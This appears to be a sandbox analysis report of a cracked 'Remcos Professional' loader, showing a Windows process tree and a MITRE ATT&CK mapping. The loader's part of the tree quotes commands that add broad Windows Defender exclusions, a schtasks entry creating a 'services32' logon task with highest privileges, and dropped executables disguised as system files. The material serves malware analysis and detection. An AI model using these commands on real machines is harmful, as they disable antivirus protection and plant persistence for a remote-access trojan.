- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6396,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=6392 /prefetch:1
  2⤵
  PID:2980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6204,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=6488 /prefetch:1
  2⤵
  PID:4056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6220,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=5320 /prefetch:1
  2⤵
  PID:2120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5508,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=5496 /prefetch:1
  2⤵
  PID:2504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=6544,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=5440 /prefetch:1
  2⤵
  PID:1160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6812,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=5372 /prefetch:8
  2⤵
  PID:1724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6380,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=6356 /prefetch:8
  2⤵
  PID:5232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1116,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=5884 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=3168,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=5744 /prefetch:1
  2⤵
  PID:1728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=3460,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3788 /prefetch:1
  2⤵
  PID:4088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5720,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3136 /prefetch:8
  2⤵
  - NTFS ADS
  PID:2432

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2220

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004E8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4316

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2344
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:5860
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 27114 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0073cc2a-9921-47b3-87e0-dad15c32a877} 5860 "\\.\pipe\gecko-crash-server-pipe.5860" gpu
    3⤵
    PID:5848
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2364 -parentBuildID 20240401114208 -prefsHandle 2356 -prefMapHandle 2352 -prefsLen 26992 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {810c1a5d-1f85-4be5-942d-f342cce1686a} 5860 "\\.\pipe\gecko-crash-server-pipe.5860" socket
    3⤵
    PID:3904
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3260 -childID 1 -isForBrowser -prefsHandle 3264 -prefMapHandle 3248 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2cf60c12-2009-4ff1-a2af-5b668c905800} 5860 "\\.\pipe\gecko-crash-server-pipe.5860" tab
    3⤵
    PID:5208
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3584 -childID 2 -isForBrowser -prefsHandle 3580 -prefMapHandle 3596 -prefsLen 32366 -prefMapSize 244628 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1ed6c88-41c2-4f61-af83-19d5053aa022} 5860 "\\.\pipe\gecko-crash-server-pipe.5860" tab
    3⤵
    PID:3456
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4656 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4648 -prefMapHandle 4704 -prefsLen 32366 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {16eded28-e62e-4862-9b73-7e4fe3ecf400} 5860 "\\.\pipe\gecko-crash-server-pipe.5860" utility
    3⤵
    - Checks processor information in registry
    PID:1028
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5396 -prefMapHandle 5144 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8018299-9121-4ef4-a752-1b2f9f9541a7} 5860 "\\.\pipe\gecko-crash-server-pipe.5860" tab
    3⤵
    PID:4584
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2768 -childID 4 -isForBrowser -prefsHandle 5740 -prefMapHandle 2848 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d62ae95-f447-445e-b4d1-5a204e042777} 5860 "\\.\pipe\gecko-crash-server-pipe.5860" tab
    3⤵
    PID:4696
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5880 -childID 5 -isForBrowser -prefsHandle 5648 -prefMapHandle 5652 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eff8d477-f317-49fa-8ca5-8c24ec4ab33f} 5860 "\\.\pipe\gecko-crash-server-pipe.5860" tab
    3⤵
    PID:2220
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6072 -childID 6 -isForBrowser -prefsHandle 6088 -prefMapHandle 6092 -prefsLen 32788 -prefMapSize 244628 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26556d10-b514-4dbf-ba70-415d9d3a0348} 5860 "\\.\pipe\gecko-crash-server-pipe.5860" tab
    3⤵
    PID:4200
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6384 -childID 7 -isForBrowser -prefsHandle 6276 -prefMapHandle 6280 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2df01ef2-2f43-4656-8aed-45be09dbc5cb} 5860 "\\.\pipe\gecko-crash-server-pipe.5860" tab
    3⤵
    PID:940
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5576 -childID 8 -isForBrowser -prefsHandle 5448 -prefMapHandle 5436 -prefsLen 27257 -prefMapSize 244628 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {329dcbae-cf10-40af-bf00-02e83a10c98f} 5860 "\\.\pipe\gecko-crash-server-pipe.5860" tab
    3⤵
    PID:2036
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5672 -childID 9 -isForBrowser -prefsHandle 5784 -prefMapHandle 6044 -prefsLen 27299 -prefMapSize 244628 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a7acbdc-7b93-4ea8-a156-cd7255cfacb1} 5860 "\\.\pipe\gecko-crash-server-pipe.5860" tab
    3⤵
    PID:3508
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4128 -childID 10 -isForBrowser -prefsHandle 3092 -prefMapHandle 5840 -prefsLen 27299 -prefMapSize 244628 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a3db647-cec5-4707-b5f8-5c39987cdac2} 5860 "\\.\pipe\gecko-crash-server-pipe.5860" tab
    3⤵
    PID:1440

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:548

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Remcos\" -ad -an -ai#7zMap13933:74:7zEvent27737
1⤵
PID:5460

C:\Users\Admin\Downloads\Remcos\Remcos Professional Cracked By Alcatraz3222\Remcos Loader.exe
"C:\Users\Admin\Downloads\Remcos\Remcos Professional Cracked By Alcatraz3222\Remcos Loader.exe"
1⤵
- Executes dropped EXE
PID:5348
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Downloads\Remcos\Remcos Professional Cracked By Alcatraz3222\Remcos Loader.exe"
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:3716
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
    3⤵
    PID:2432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2356
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5876
- - C:\Windows\System32\cmd.exe
    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
    3⤵
    PID:1632
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3000
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c "C:\Windows\system32\services32.exe"
    3⤵
    PID:5932
  - - C:\Windows\system32\services32.exe
      C:\Windows\system32\services32.exe
      4⤵
      Executes dropped EXE
      PID:5244
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"
        5⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:5708
      - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        6⤵
        
        PID:4416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6136
      - C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
        
        "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
        6⤵
        Executes dropped EXE
        
        PID:1888
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost32"
        7⤵
        
        PID:2416

C:\Windows\System32\Taskmgr.exe
"C:\Windows\System32\Taskmgr.exe"
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
PID:4020

C:\Users\Admin\Downloads\Remcos\Remcos Professional Cracked By Alcatraz3222\Remcos Loader.exe
"C:\Users\Admin\Downloads\Remcos\Remcos Professional Cracked By Alcatraz3222\Remcos Loader.exe"
1⤵
- Executes dropped EXE
PID:5600
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Downloads\Remcos\Remcos Professional Cracked By Alcatraz3222\Remcos Loader.exe"
  2⤵
  - Drops file in System32 directory
  PID:4828
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
    3⤵
    PID:2284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5372
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c taskkill /f /PID "2416"
    3⤵
    PID:2052
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /PID "2416"
      4⤵
      Kills process with taskkill
      PID:5704
- - C:\Windows\System32\cmd.exe
    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
    3⤵
    PID:1688
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4464
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c "C:\Windows\system32\services32.exe"
    3⤵
    PID:2164
  - - C:\Windows\system32\services32.exe
      C:\Windows\system32\services32.exe
      4⤵
      Executes dropped EXE
      PID:5600
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"
        5⤵
        Drops file in System32 directory
        
        PID:5416
      - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        6⤵
        
        PID:3392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4940
      - C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
        
        "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
        6⤵
        Executes dropped EXE
        
        PID:2376
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost32"
        7⤵
        
        PID:2544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery